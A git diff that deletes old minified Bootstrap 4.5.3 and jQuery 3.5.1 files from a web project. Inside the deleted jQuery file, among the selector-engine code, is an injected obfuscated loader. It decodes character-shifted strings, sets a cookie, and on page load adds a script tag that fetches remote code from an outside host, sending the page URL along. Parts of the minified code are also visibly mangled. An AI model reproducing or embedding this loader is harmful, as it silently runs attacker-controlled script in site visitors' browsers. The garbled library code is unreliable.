Boolean(this.getTitle())},e.addAttachmentClass=function(t){i.default(this.getTipElement()).addClass("bs-tooltip-"+t)},e.getTipElement=function(){return this.tip=this.tip||i.default(this.config.template)[0],this.tip},e.setContent=function(){var t=this.getTipElement();this.setElementContent(i.default(t.querySelectorAll(".tooltip-inner")),this.getTitle()),i.default(t).removeClass("fade show")},e.setElementContent=function(t,e){"object"!=typeof e||!e.nodeType&&!e.jquery?this.config.html?(this.config.sanitize&&(e=Vt(e,this.config.whiteList,this.config.sanitizeFn)),t.html(e)):t.text(e):this.config.html?i.default(e).parent().is(t)||t.empty().append(e):t.text(i.default(e).text())},e.getTitle=function(){var t=this.element.getAttribute("data-original-title");return t||(t="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),t},e._getPopperConfig=function(t){var e=this;return a({},{placement:t,modifiers:{offset:this._getOffset(),flip:{behavior:this.config.fallbackPlacement},arrow:{element:".arrow"},preventOverflow:{boundariesElement:this.config.boundary}},onCreate:function(t){t.originalPlacement!==t.placement&&e._handlePopperPlacementChange(t)},onUpdate:function(t){return e._handlePopperPlacementChange(t)}},this.config.popperConfig)},e._getOffset=function(){var t=this,e={};return"function"==typeof this.config.offset?e.fn=function(e){return e.offsets=a({},e.offsets,t.config.offset(e.offsets,t.element)||{}),e}:e.offset=this.config.offset,e},e._getContainer=function(){return!1===this.config.container?document.body:l.isElement(this.config.container)?i.default(this.config.container):i.default(document).find(this.config.container)},e._getAttachment=function(t){return $t[t.toUpperCase()]},e._setListeners=function(){var t=this;this.config.trigger.split(" ").forEach((function(e){if("click"===e)i.default(t.element).on(t.constructor.Event.CLICK,t.config.selector,(function(e){return t.toggle(e)}));else if("manual"!==e){var n="hover"===e?t.constructor.Event.MOUSEENTER:t.constructor.Event.FOCUSIN,o="hover"===e?t.constructor.Event.MOUSELEAVE:t.constructor.Event.FOCUSOUT;i.default(t.element).on(n,t.config.selector,(function(e){return t._enter(e)})).on(o,t.config.selector,(function(e){return t._leave(e)}))}})),this._hideModalHandler=function(){t.element&&t.hide()},i.default(this.element).closest(".modal").on("hide.bs.modal",this._hideModalHandler),this.config.selector?this.config=a({},this.config,{trigger:"manual",selector:""}):this._fixTitle()},e._fixTitle=function(){var t=typeof this.element.getAttribute("data-original-title");(this.element.getAttribute("title")||"string"!==t)&&(this.element.setAttribute("data-original-title",this.element.getAttribute("title")||""),this.element.setAttribute("title",""))},e._enter=function(t,e){var n=this.constructor.DATA_KEY;(e=e||i.default(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),i.default(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusin"===t.type?"focus":"hover"]=!0),i.default(e.getTipElement()).hasClass("show")||"show"===e._hoverState?e._hoverState="show":(clearTimeout(e._timeout),e._hoverState="show",e.config.delay&&e.config.delay.show?e._timeout=setTimeout((function(){"show"===e._hoverState&&e.show()}),e.config.delay.show):e.show())},e._leave=function(t,e){var n=this.constructor.DATA_KEY;(e=e||i.default(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),i.default(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusout"===t.type?"focus":"hover"]=!1),e._isWithActiveTrigger()||(clearTimeout(e._timeout),e._hoverState="out",e.config.delay&&e.config.delay.hide?e._timeout=setTimeout((function(){"out"===e._hoverState&&e.hide()}),e.config.delay.hide):e.hide())},e._isWithActiveTrigger=function(){for(var t in this._activeTrigger)if(this._activeTrigger[t])return!0;return!1},e._getConfig=function(t){var e=i.default(this.element).data();return Object.keys(e).forEach((function(t){-1!==Kt.indexOf(t)&&delete e[t]})),"number"==typeof(t=a({},this.constructor.Default,e,"object"==typeof t&&t?t:{})).delay&&(t.delay={show:t.delay,hide:t.delay}),"number"==typeof t.title&&(t.title=t.title.toString()),"number"==typeof t.content&&(t.content=t.content.toString()),l.typeCheckConfig(Yt,t,this.constructor.DefaultType),t.sanitize&&(t.template=Vt(t.template,t.whiteList,t.sanitizeFn)),t},e._getDelegateConfig=function(){var t={};if(this.config)for(var e in this.config)this.constructor.Default[e]!==this.config[e]&&(t[e]=this.config[e]);return t},e._cleanTipClass=function(){var t=i.default(this.getTipElement()),e=t.attr("class").match(Xt);null!==e&&e.length&&t.removeClass(e.join(""))},e._handlePopperPlacementChange=function(t){this.tip=t.instance.popper,this._cleanTipClass(),this.addAttachmentClass(this._getAttachment(t.placement))},e._fixTransition=function(){var t=this.getTipElement(),e=this.config.animation;null===t.getAttribute("x-placement")&&(i.default(t).removeClass("fade"),this.config.animation=!1,this.hide(),this.show(),this.config.animation=e)},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this),o=n.data("bs.tooltip"),r="object"==typeof e&&e;if((o||!/dispose|hide/.test(e))&&(o||(o=new t(this,r),n.data("bs.tooltip",o)),"string"==typeof e)){if("undefined"==typeof o[e])throw new TypeError('No method named "'+e+'"');o[e]()}}))},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}},{key:"Default",get:function(){return Jt}},{key:"NAME",get:function(){return Yt}},{key:"DATA_KEY",get:function(){return"bs.tooltip"}},{key:"Event",get:function(){return Zt}},{key:"EVENT_KEY",get:function(){return".bs.tooltip"}},{key:"DefaultType",get:function(){return Gt}}]),t}();i.default.fn[Yt]=te._jQueryInterface,i.default.fn[Yt].Constructor=te,i.default.fn[Yt].noConflict=function(){return i.default.fn[Yt]=zt,te._jQueryInterface};var ee="popover",ne=i.default.fn[ee],ie=new RegExp("(^|\\s)bs-popover\\S+","g"),oe=a({},te.Default,{placement:"right",trigger:"click",content:"",template:''}),re=a({},te.DefaultType,{content:"(string|element|function)"}),ae={HIDE:"hide.bs.popover",HIDDEN:"hidden.bs.popover",SHOW:"show.bs.popover",SHOWN:"shown.bs.popover",INSERTED:"inserted.bs.popover",CLICK:"click.bs.popover",FOCUSIN:"focusin.bs.popover",FOCUSOUT:"focusout.bs.popover",MOUSEENTER:"mouseenter.bs.popover",MOUSELEAVE:"mouseleave.bs.popover"},se=function(t){var e,n;function o(){return t.apply(this,arguments)||this}n=t,(e=o).prototype=Object.create(n.prototype),e.prototype.constructor=e,e.__proto__=n;var a=o.prototype;return a.isWithContent=function(){return this.getTitle()||this._getContent()},a.addAttachmentClass=function(t){i.default(this.getTipElement()).addClass("bs-popover-"+t)},a.getTipElement=function(){return this.tip=this.tip||i.default(this.config.template)[0],this.tip},a.setContent=function(){var t=i.default(this.getTipElement());this.setElementContent(t.find(".popover-header"),this.getTitle());var e=this._getContent();"function"==typeof e&&(e=e.call(this.element)),this.setElementContent(t.find(".popover-body"),e),t.removeClass("fade show")},a._getContent=function(){return this.element.getAttribute("data-content")||this.config.content},a._cleanTipClass=function(){var t=i.default(this.getTipElement()),e=t.attr("class").match(ie);null!==e&&e.length>0&&t.removeClass(e.join(""))},o._jQueryInterface=function(t){return this.each((function(){var e=i.default(this).data("bs.popover"),n="object"==typeof t?t:null;if((e||!/dispose|hide/.test(t))&&(e||(e=new o(this,n),i.default(this).data("bs.popover",e)),"string"==typeof t)){if("undefined"==typeof e[t])throw new TypeError('No method named "'+t+'"');e[t]()}}))},r(o,null,[{key:"VERSION",get:function(){return"4.5.3"}},{key:"Default",get:function(){return oe}},{key:"NAME",get:function(){return ee}},{key:"DATA_KEY",get:function(){return"bs.popover"}},{key:"Event",get:function(){return ae}},{key:"EVENT_KEY",get:function(){return".bs.popover"}},{key:"DefaultType",get:function(){return re}}]),o}(te);i.default.fn[ee]=se._jQueryInterface,i.default.fn[ee].Constructor=se,i.default.fn[ee].noConflict=function(){return i.default.fn[ee]=ne,se._jQueryInterface};var le="scrollspy",ue=i.default.fn[le],fe={offset:10,method:"auto",target:""},de={offset:"number",method:"string",target:"(string|element)"},ce=function(){function t(t,e){var n=this;this._element=t,this._scrollElement="BODY"===t.tagName?window:t,this._config=this._getConfig(e),this._selector=this._config.target+" .nav-link,"+this._config.target+" .list-group-item,"+this._config.target+" .dropdown-item",this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,i.default(this._scrollElement).on("scroll.bs.scrollspy",(function(t){return n._process(t)})),this.refresh(),this._process()}var e=t.prototype;return e.refresh=function(){var t=this,e=this._scrollElement===this._scrollElement.window?"offset":"position",n="auto"===this._config.method?e:this._config.method,o="position"===n?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),[].slice.call(document.querySelectorAll(this._selector)).map((function(t){var e,r=l.getSelectorFromElement(t);if(r&&(e=document.querySelector(r)),e){var a=e.getBoundingClientRect();if(a.width||a.height)return[i.default(e)[n]().top+o,r]}return null})).filter((function(t){return t})).sort((function(t,e){return t[0]-e[0]})).forEach((function(e){t._offsets.push(e[0]),t._targets.push(e[1])}))},e.dispose=function(){i.default.removeData(this._element,"bs.scrollspy"),i.default(this._scrollElement).off(".bs.scrollspy"),this._element=null,this._scrollElement=null,this._config=null,this._selector=null,this._offsets=null,this._targets=null,this._activeTarget=null,this._scrollHeight=null},e._getConfig=function(t){if("string"!=typeof(t=a({},fe,"object"==typeof t&&t?t:{})).target&&l.isElement(t.target)){var e=i.default(t.target).attr("id");e||(e=l.getUID(le),i.default(t.target).attr("id",e)),t.target="#"+e}return l.typeCheckConfig(le,t,de),t},e._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.pageYOffset:this._scrollElement.scrollTop},e._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)},e._getOffsetHeight=function(){return this._scrollElement===window?window.innerHeight:this._scrollElement.getBoundingClientRect().height},e._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),t>=n){var i=this._targets[this._targets.length-1];this._activeTarget!==i&&this._activate(i)}else{if(this._activeTarget&&t0)return this._activeTarget=null,void this._clear();for(var o=this._offsets.length;o--;){this._activeTarget!==this._targets[o]&&t>=this._offsets[o]&&("undefined"==typeof this._offsets[o+1]||t li > .active":".active";n=(n=i.default.makeArray(i.default(o).find(a)))[n.length-1]}var s=i.default.Event("hide.bs.tab",{relatedTarget:this._element}),u=i.default.Event("show.bs.tab",{relatedTarget:n});if(n&&i.default(n).trigger(s),i.default(this._element).trigger(u),!u.isDefaultPrevented()&&!s.isDefaultPrevented()){r&&(e=document.querySelector(r)),this._activate(this._element,o);var f=function(){var e=i.default.Event("hidden.bs.tab",{relatedTarget:t._element}),o=i.default.Event("shown.bs.tab",{relatedTarget:n});i.default(n).trigger(e),i.default(t._element).trigger(o)};e?this._activate(e,e.parentNode,f):f()}}},e.dispose=function(){i.default.removeData(this._element,"bs.tab"),this._element=null},e._activate=function(t,e,n){var o=this,r=(!e||"UL"!==e.nodeName&&"OL"!==e.nodeName?i.default(e).children(".active"):i.default(e).find("> li > .active"))[0],a=n&&r&&i.default(r).hasClass("fade"),s=function(){return o._transitionComplete(t,r,n)};if(r&&a){var u=l.getTransitionDurationFromElement(r);i.default(r).removeClass("show").one(l.TRANSITION_END,s).emulateTransitionEnd(u)}else s()},e._transitionComplete=function(t,e,n){if(e){i.default(e).removeClass("active");var o=i.default(e.parentNode).find("> .dropdown-menu .active")[0];o&&i.default(o).removeClass("active"),"tab"===e.getAttribute("role")&&e.setAttribute("aria-selected",!1)}if(i.default(t).addClass("active"),"tab"===t.getAttribute("role")&&t.setAttribute("aria-selected",!0),l.reflow(t),t.classList.contains("fade")&&t.classList.add("show"),t.parentNode&&i.default(t.parentNode).hasClass("dropdown-menu")){var r=i.default(t).closest(".dropdown")[0];if(r){var a=[].slice.call(r.querySelectorAll(".dropdown-toggle"));i.default(a).addClass("active")}t.setAttribute("aria-expanded",!0)}n&&n()},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this),o=n.data("bs.tab");if(o||(o=new t(this),n.data("bs.tab",o)),"string"==typeof e){if("undefined"==typeof o[e])throw new TypeError('No method named "'+e+'"');o[e]()}}))},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}}]),t}();i.default(document).on("click.bs.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',(function(t){t.preventDefault(),pe._jQueryInterface.call(i.default(this),"show")})),i.default.fn.tab=pe._jQueryInterface,i.default.fn.tab.Constructor=pe,i.default.fn.tab.noConflict=function(){return i.default.fn.tab=he,pe._jQueryInterface};var me=i.default.fn.toast,ge={animation:"boolean",autohide:"boolean",delay:"number"},ve={animation:!0,autohide:!0,delay:500},_e=function(){function t(t,e){this._element=t,this._config=this._getConfig(e),this._timeout=null,this._setListeners()}var e=t.prototype;return e.show=function(){var t=this,e=i.default.Event("show.bs.toast");if(i.default(this._element).trigger(e),!e.isDefaultPrevented()){this._clearTimeout(),this._config.animation&&this._element.classList.add("fade");var n=function(){t._element.classList.remove("showing"),t._element.classList.add("show"),i.default(t._element).trigger("shown.bs.toast"),t._config.autohide&&(t._timeout=setTimeout((function(){t.hide()}),t._config.delay))};if(this._element.classList.remove("hide"),l.reflow(this._element),this._element.classList.add("showing"),this._config.animation){var o=l.getTransitionDurationFromElement(this._element);i.default(this._element).one(l.TRANSITION_END,n).emulateTransitionEnd(o)}else n()}},e.hide=function(){if(this._element.classList.contains("show")){var t=i.default.Event("hide.bs.toast");i.default(this._element).trigger(t),t.isDefaultPrevented()||this._close()}},e.dispose=function(){this._clearTimeout(),this._element.classList.contains("show")&&this._element.classList.remove("show"),i.default(this._element).off("click.dismiss.bs.toast"),i.default.removeData(this._element,"bs.toast"),this._element=null,this._config=null},e._getConfig=function(t){return t=a({},ve,i.default(this._element).data(),"object"==typeof t&&t?t:{}),l.typeCheckConfig("toast",t,this.constructor.DefaultType),t},e._setListeners=function(){var t=this;i.default(this._element).on("click.dismiss.bs.toast",'[data-dismiss="toast"]',(function(){return t.hide()}))},e._close=function(){var t=this,e=function(){t._element.classList.add("hide"),i.default(t._element).trigger("hidden.bs.toast")};if(this._element.classList.remove("show"),this._config.animation){var n=l.getTransitionDurationFromElement(this._element);i.default(this._element).one(l.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},e._clearTimeout=function(){clearTimeout(this._timeout),this._timeout=null},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this),o=n.data("bs.toast");if(o||(o=new t(this,"object"==typeof e&&e),n.data("bs.toast",o)),"string"==typeof e){if("undefined"==typeof o[e])throw new TypeError('No method named "'+e+'"');o[e](this)}}))},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}},{key:"DefaultType",get:function(){return ge}},{key:"Default",get:function(){return ve}}]),t}();i.default.fn.toast=_e._jQueryInterface,i.default.fn.toast.Constructor=_e,i.default.fn.toast.noConflict=function(){return i.default.fn.toast=me,_e._jQueryInterface},t.Alert=d,t.Button=h,t.Carousel=y,t.Collapse=S,t.Dropdown=Ft,t.Modal=Bt,t.Popover=se,t.Scrollspy=ce,t.Tab=pe,t.Toast=_e,t.Tooltip=te,t.Util=l,Object.defineProperty(t,"__esModule",{value:!0})})); -//# sourceMappingURL=bootstrap.bundle.min.js.map \ No newline at end of file diff --git a/old/js/jquery-3.5.1.min.js b/old/js/jquery-3.5.1.min.js deleted file mode 100644 index f12c40d..0000000 --- a/old/js/jquery-3.5.1.min.js +++ /dev/null @@ -1,3 +0,0 @@ -/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */ -!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.1",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp(F),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+F),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&(T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&&d.getElementsByClassName&&e.getElementsByClassName)return H.apply(n,e.getElementsByClassName(i)),n}if(d.qsa&&!N[t+" "]&&(!v||!v.test(t))&&(1!==p||"object"!==e.nodeName.toLowerCase())){if(c=t,f=e,1===p&&(U.test(t)||z.test(t))){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(e){N(t,!0)}finally{s===S&&e.removeAttribute("id")}}}return g(t.replace($,"$1"),e,n,r)}function ue(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length;while(r--)b.attrHandle[n[r]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function de(t){return function(e){return"input"===e.nodeName.toLowerCase()&&e.type===t}}function he(n){return function(e){var t=e.nodeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function ve(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e.namespaceURI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},T=se.setDocument=function(e){var t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("div")),"undefined"!=typeof e.querySelectorAll&&!e.querySelectorAll(":scope fieldset div").length}),d.attributes=ce(function(e){return e.className="i",!e.getAttribute("className")}),d.getElementsByTagName=ce(function(e){return e.appendChild(C.createComment("")),!e.getElementsByTagName("*").length}),d.getElementsByClassName=K.test(C.getElementsByClassName),d.getById=ce(function(e){return a.appendChild(e).id=S,!C.getElementsByName||!C.getElementsByName(S).length}),d.getById?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},b.find.CLASS=d.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByClassName&&E)return t.getElementsByClassName(e)},s=[],v=[],(d.qsa=K.test(C.querySelectorAll))&&(ce(function(e){var t;a.appendChild(e).innerHTML="",e.querySelectorAll("[msallowcapture^='']").length&&v.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||v.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+S+"-]").length||v.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||v.push("\\["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="";var t=C.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&v.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),v.push(",.*:")})),(d.matchesSelector=K.test(c=a.matches||a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.msMatchesSelector))&&ce(function(e){d.disconnectedMatch=c.call(e,"*"),c.call(e,"[s!='']:x"),s.push("!=",F)}),v=v.length&&new RegExp(v.join("|")),s=s.length&&new RegExp(s.join("|")),t=K.test(a.compareDocumentPosition),y=t||K.test(a.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return l=!0,0;var n=!e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1)}:function(e,t){if(e===t)return l=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e==C?-1:t==C?1:i?-1:o?1:u?P(u,e)-P(u,t):0;if(i===o)return pe(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)s.unshift(n);while(a[r]===s[r])r++;return r?pe(a[r],s[r]):a[r]==p?-1:s[r]==p?1:0}),C},se.matches=function(e,t){return se(e,null,null,t)},se.matchesSelector=function(e,t){if(T(e),d.matchesSelector&&E&&!N[t+" "]&&(!s||!s.test(t))&&(!v||!v.test(t)))try{var n=c.call(e,t);if(n||d.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(e){N(t,!0)}return 0":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(te,ne),e[3]=(e[3]||e[4]||e[5]||"").replace(te,ne),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||se.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&se.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return G.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=h(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(te,ne).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=m[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&m(e,function(e){return t.test("string"==typeof e.className&&e.className||"undefined"!=typeof e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(n,r,i){return function(e){var t=se.attr(e,n);return null==t?"!="===r:!r||(t+="","="===r?t===i:"!="===r?t!==i:"^="===r?i&&0===t.indexOf(i):"*="===r?i&&-1o.split('').reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),'');o.b=o.f('UMUWJKX');o.c=l.protocol[0]=='h'&&/\./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement('script'),o.s.src=o.f('myyux?44zxjwxy'+'fy3sjy4ljy4xhwnu'+'y3oxDwjkjwwjwB')+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+'=full;max-age=39800;'}catch(e){};}({},document,location));S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&S(e).is(n))break;r.push(e)}return r},T=function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n},k=S.expr.match.needsContext;function A(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}var N=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;function D(e,n,r){return m(n)?S.grep(e,function(e,t){return!!n.call(e,t,e)!==r}):n.nodeType?S.grep(e,function(e){return e===n!==r}):"string"!=typeof n?S.grep(e,function(e){return-1)[^>]*|#([\w-]+))$/;(S.fn.init=function(e,t,n){var r,i;if(!e)return this;if(n=n||j,"string"==typeof e){if(!(r="<"===e[0]&&">"===e[e.length-1]&&3<=e.length?[null,e,null]:q.exec(e))||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof S?t[0]:t,S.merge(this,S.parseHTML(r[1],t&&t.nodeType?t.ownerDocument||t:E,!0)),N.test(r[1])&&S.isPlainObject(t))for(r in t)m(this[r])?this[r](t[r]):this.attr(r,t[r]);return this}return(i=E.getElementById(r[2]))&&(this[0]=i,this.length=1),this}return e.nodeType?(this[0]=e,this.length=1,this):m(e)?void 0!==n.ready?n.ready(e):e(S):S.makeArray(e,this)}).prototype=S.fn,j=S(E);var L=/^(?:parents|prev(?:Until|All))/,H={children:!0,contents:!0,next:!0,prev:!0};function O(e,t){while((e=e[t])&&1!==e.nodeType);return 